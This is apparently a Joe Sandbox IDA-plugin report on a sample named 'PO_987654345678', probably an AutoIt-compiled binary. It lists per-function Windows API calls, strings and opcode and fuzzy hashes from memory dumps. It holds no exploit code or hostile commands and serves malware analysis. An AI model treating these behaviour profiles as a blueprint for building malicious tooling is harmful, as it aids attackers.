                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: 9c5c074b0d69597a3f8029bd95cb3a4caedf9cf830b60b5c9e92719807b783a6
                          • Instruction ID: a5cbb6e1c939491fe862a3513747a74a1a48c190a93b4be73cd57db78e82c256
                          • Opcode Fuzzy Hash: 9c5c074b0d69597a3f8029bd95cb3a4caedf9cf830b60b5c9e92719807b783a6
                          • Instruction Fuzzy Hash: E031C236E001059FD710DF68C895FAA7BB4EF04715F14C05AE40ACB292DBB1ED82EB92
                          APIs
                          • CreateMenu.USER32 ref: 00F93C79
                          • SetMenu.USER32(?,00000000), ref: 00F93C88
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F93D10
                          • IsMenu.USER32(?), ref: 00F93D24
                          • CreatePopupMenu.USER32 ref: 00F93D2E
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F93D5B
                          • DrawMenuBar.USER32 ref: 00F93D63
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                          • String ID: 0$F
                          • API String ID: 161812096-3044882817
                          • Opcode ID: 24cf820bfae21acf2309d5bfe5c7abea1564890e77698ef8f01f78857cb91a24
                          • Instruction ID: 1342bec8caaed5187fe7d011de13c1a2599c4ec36f0556d2a55fad4f7e48648e
                          • Opcode Fuzzy Hash: 24cf820bfae21acf2309d5bfe5c7abea1564890e77698ef8f01f78857cb91a24
                          • Instruction Fuzzy Hash: 5A414CB5A01209EFEF14CFA4D854AAA7BB5FF49350F14002AF94697360D770AA10EF94
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00F61F64
                          • GetDlgCtrlID.USER32 ref: 00F61F6F
                          • GetParent.USER32 ref: 00F61F8B
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F61F8E
                          • GetDlgCtrlID.USER32(?), ref: 00F61F97
                          • GetParent.USER32(?), ref: 00F61FAB
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F61FAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 711023334-1403004172
                          • Opcode ID: b4e0dbb30c01fbf5d078ed8c57ee16912202724c452858544ec03318421778f8
                          • Instruction ID: 98ebacc11b304ecf56b6e1c6a6cf2e563f7325570f4706b0f85ad6a9ee0c163c
                          • Opcode Fuzzy Hash: b4e0dbb30c01fbf5d078ed8c57ee16912202724c452858544ec03318421778f8
                          • Instruction Fuzzy Hash: F121B371D00118BBCF04AFA0DC45EEEBBB4AF15310F004116B955672D1DB795914BB60
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F93A9D
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F93AA0
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F93AC7
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F93AEA
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F93B62
                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00F93BAC
                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00F93BC7
                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00F93BE2
                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00F93BF6
                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00F93C13
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow
                          • String ID:
                          • API String ID: 312131281-0
                          • Opcode ID: c9c58bb32c416fc72f01f2dac22eb983298ab9fdeab1e346d98e66e96fb60fa3
                          • Instruction ID: c9b08deab6c3993dedc076f2b6c4e67ec6d0ced1771f81ed29cd58230946a715
                          • Opcode Fuzzy Hash: c9c58bb32c416fc72f01f2dac22eb983298ab9fdeab1e346d98e66e96fb60fa3
                          • Instruction Fuzzy Hash: 2F617D75900208AFEB10DFA4CC81EEE77F9EB49710F10015AFA15A7291D774AE45EB50
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00F6B151
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B165
                          • GetWindowThreadProcessId.USER32(00000000), ref: 00F6B16C
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B17B
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F6B18D
                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B1A6
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B1B8
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B1FD
                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B212
                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F6A1E1,?,00000001), ref: 00F6B21D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: ad4b2fa7a719eeed0435aa8649d380356eb93b67b66a874ef92e869eebe3699b
                          • Instruction ID: 27c093c9ef9cbd3850162190fe224e7efa7da6fb28a2acd070cf596f7fdd2a16
                          • Opcode Fuzzy Hash: ad4b2fa7a719eeed0435aa8649d380356eb93b67b66a874ef92e869eebe3699b
                          • Instruction Fuzzy Hash: B431AD71900208BFDB119F64DC68B6E7BAABB51325F108016FB05D6190D7B49E80BFA1
                          APIs
                          • _free.LIBCMT ref: 00F32C94
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • _free.LIBCMT ref: 00F32CA0
                          • _free.LIBCMT ref: 00F32CAB
                          • _free.LIBCMT ref: 00F32CB6
                          • _free.LIBCMT ref: 00F32CC1
                          • _free.LIBCMT ref: 00F32CCC
                          • _free.LIBCMT ref: 00F32CD7
                          • _free.LIBCMT ref: 00F32CE2
                          • _free.LIBCMT ref: 00F32CED
                          • _free.LIBCMT ref: 00F32CFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: fe6f2646955a864cc3f3a1531621f513e641ee0abfbccb1588d866af8ee37d78
                          • Instruction ID: 909fc3512af9a9f15ed6c902e45331a0ce0a4040da48bd640d7edd5163e43f97
                          • Opcode Fuzzy Hash: fe6f2646955a864cc3f3a1531621f513e641ee0abfbccb1588d866af8ee37d78
                          • Instruction Fuzzy Hash: 47119376501118AFCB82EF58EC82DDD7BB5FF05360F4144A5FA489B222DA35EA50BB90
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F01459
                          • OleUninitialize.OLE32(?,00000000), ref: 00F014F8
                          • UnregisterHotKey.USER32(?), ref: 00F016DD
                          • DestroyWindow.USER32(?), ref: 00F424B9
                          • FreeLibrary.KERNEL32(?), ref: 00F4251E
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F4254B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 469580280-3243417748
                          • Opcode ID: 854b11a36fd30cc9e3facc8d36b6ce2cd05fd662c95d62b35760744cf0e8e0ab
                          • Instruction ID: b6b1a317cfeb50245a7917088f4cc519f43488b049775f15f616827c07cc1749
                          • Opcode Fuzzy Hash: 854b11a36fd30cc9e3facc8d36b6ce2cd05fd662c95d62b35760744cf0e8e0ab
                          • Instruction Fuzzy Hash: F4D17F31701212CFDB19DF14C895B29FBA0BF05710F5542ADE84A6B2A2DB31AD52FF91
                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F77FAD
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F77FC1
                          • GetFileAttributesW.KERNEL32(?), ref: 00F77FEB
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F78005
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78017
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78060
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F780B0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CurrentDirectory$AttributesFile
                          • String ID: *.*
                          • API String ID: 769691225-438819550
                          • Opcode ID: c592be9c45e31415db949e27ea7f60b980f38c9da636af6ad7c448fa2c3cee30
                          • Instruction ID: 7ca6e0e2fca4897cba96668be6f57ee9cbc777ede8fc2d5fbcca333d394023db
                          • Opcode Fuzzy Hash: c592be9c45e31415db949e27ea7f60b980f38c9da636af6ad7c448fa2c3cee30
                          • Instruction Fuzzy Hash: A48180729183459BDB20EF14C844AAEB3D8BB88364F148C6FF889C7250DB74DD45AB93
                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 00F05C7A
                            • Part of subcall function 00F05D0A: GetClientRect.USER32(?,?), ref: 00F05D30
                            • Part of subcall function 00F05D0A: GetWindowRect.USER32(?,?), ref: 00F05D71
                            • Part of subcall function 00F05D0A: ScreenToClient.USER32(?,?), ref: 00F05D99
                          • GetDC.USER32 ref: 00F446F5
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F44708
                          • SelectObject.GDI32(00000000,00000000), ref: 00F44716
                          • SelectObject.GDI32(00000000,00000000), ref: 00F4472B
                          • ReleaseDC.USER32(?,00000000), ref: 00F44733
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F447C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          • Opcode ID: f2160e68cf7d01baaeb939cdaf7838b6ef20dd3c4d94882545d12330dd66e17e
                          • Instruction ID: 7c613f42331a48e8bce235463fecd06a539b2c54f427bfc3bf05d76911eeddad
                          • Opcode Fuzzy Hash: f2160e68cf7d01baaeb939cdaf7838b6ef20dd3c4d94882545d12330dd66e17e
                          • Instruction Fuzzy Hash: 9571D331900209DFDF218F64C984BBA7FB5FF46364F14426AED556A1A6C731A842FF50
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00F735E4
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • LoadStringW.USER32(00FD2390,?,00000FFF,?), ref: 00F7360A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LoadString$_wcslen
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 4099089115-2391861430
                          • Opcode ID: edb2f444092cbb1f6dd7a156c60fdfaea52172b00e57aac01848a2dfb6850f77
                          • Instruction ID: 2ed9fa976509df6cee2edd8dec91dac005569f43065a6e686ec92a022a6dbf8e
                          • Opcode Fuzzy Hash: edb2f444092cbb1f6dd7a156c60fdfaea52172b00e57aac01848a2dfb6850f77
                          • Instruction Fuzzy Hash: F8517071C0421ABADF19EBA0CC42EEEBB79EF04310F444126F10572192EB755A99FFA1
                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7C272
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F7C29A
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F7C2CA
                          • GetLastError.KERNEL32 ref: 00F7C322
                          • SetEvent.KERNEL32(?), ref: 00F7C336
                          • InternetCloseHandle.WININET(00000000), ref: 00F7C341
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 3113390036-3916222277
                          • Opcode ID: 4e298b0bf934727a48a620cdf31409d1424f1835a1d5496bd2fed568c44ce9a5
                          • Instruction ID: b52eca57eacb2cf7380a3fca0e1262d01513ca23a9b25f41113e5ea3f7d3b047
                          • Opcode Fuzzy Hash: 4e298b0bf934727a48a620cdf31409d1424f1835a1d5496bd2fed568c44ce9a5
                          • Instruction Fuzzy Hash: E0314DB1500608AFD7619FA49C88AAB7BFCEB49754B14851FF44AD2201DB34DD44ABB2
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F43AAF,?,?,Bad directive syntax error,00F9CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F698BC
                          • LoadStringW.USER32(00000000,?,00F43AAF,?), ref: 00F698C3
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F69987
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HandleLoadMessageModuleString_wcslen
                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                          • API String ID: 858772685-4153970271
                          • Opcode ID: 50eb4652bbb4c1cf762535c4acb0b7d181089dd6c5df3e2d3873944b69a65dd5
                          • Instruction ID: 017008e2d194d28a2e435e2797dd8bc7a12762309f6a74677d489b1a00214489
                          • Opcode Fuzzy Hash: 50eb4652bbb4c1cf762535c4acb0b7d181089dd6c5df3e2d3873944b69a65dd5
                          • Instruction Fuzzy Hash: F3217C32C0821AABDF15EF90CC46EEE7779FF18300F04446AF515A20A2EB75A658FB51
                          APIs
                          • GetParent.USER32 ref: 00F620AB
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00F620C0
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F6214D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ClassMessageNameParentSend
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1290815626-3381328864
                          • Opcode ID: beb3ca3095d45911be63928c569426d3cad0c66e58493e9ffd1915e67993584b
                          • Instruction ID: 14572403d6e4d61442dc01d818c69681692c88f8cda213c1cccd4f896cedfb9b
                          • Opcode Fuzzy Hash: beb3ca3095d45911be63928c569426d3cad0c66e58493e9ffd1915e67993584b
                          • Instruction Fuzzy Hash: 4A112C7768CB17B9F6056620EC07EE6779CCB16724B20001BFB04B50E1FEA9BC417A55
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                          • String ID:
                          • API String ID: 1282221369-0
                          • Opcode ID: b1214ec23b0bd7b390240c916cbf1515526c6bddb0568bd9b14db8b6b4f1f588
                          • Instruction ID: 499e9e59f36b53d64291d29ba9ce3d9017593e7863c4f00ea5ba6efba74c3680
                          • Opcode Fuzzy Hash: b1214ec23b0bd7b390240c916cbf1515526c6bddb0568bd9b14db8b6b4f1f588
                          • Instruction Fuzzy Hash: 0A6134B1D05314AFDB25AFB4AC81B6D7BA6EF05770F04416EF940A7281DB369900F7A0
                          APIs
                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00F95186
                          • ShowWindow.USER32(?,00000000), ref: 00F951C7
                          • ShowWindow.USER32(?,00000005,?,00000000), ref: 00F951CD
                          • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00F951D1
                            • Part of subcall function 00F96FBA: DeleteObject.GDI32(00000000), ref: 00F96FE6
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F9520D
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F9521A
                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F9524D
                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00F95287
                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00F95296
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                          • String ID:
                          • API String ID: 3210457359-0
                          • Opcode ID: 4f413ed3157bc74c500b54e749ac09b6bacd2cc1efae9258fd61a32d9e2b591a
                          • Instruction ID: 673e4fc74bbd1b17fc3121621aa856695fae941623a0296f3aa4c7c7628a5c92
                          • Opcode Fuzzy Hash: 4f413ed3157bc74c500b54e749ac09b6bacd2cc1efae9258fd61a32d9e2b591a
                          • Instruction Fuzzy Hash: 15519D31A44A08BFFF269F64CC4ABD83B65FB05B25F144012F619962E0C376A980FB81
                          APIs
                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F56890
                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F568A9
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F568B9
                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F568D1
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F568F2
                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F18874,00000000,00000000,00000000,000000FF,00000000), ref: 00F56901
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F5691E
                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F18874,00000000,00000000,00000000,000000FF,00000000), ref: 00F5692D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                          • String ID:
                          • API String ID: 1268354404-0
                          • Opcode ID: 219a479f5775c2becd59ceb4f8a27118f57007efd3aa9adef42defa130997cdc
                          • Instruction ID: 3665997ab61c2dba44e4f3dd336f431a73e9ed3c8fa2f64cc19966f7d9d2357c
                          • Opcode Fuzzy Hash: 219a479f5775c2becd59ceb4f8a27118f57007efd3aa9adef42defa130997cdc
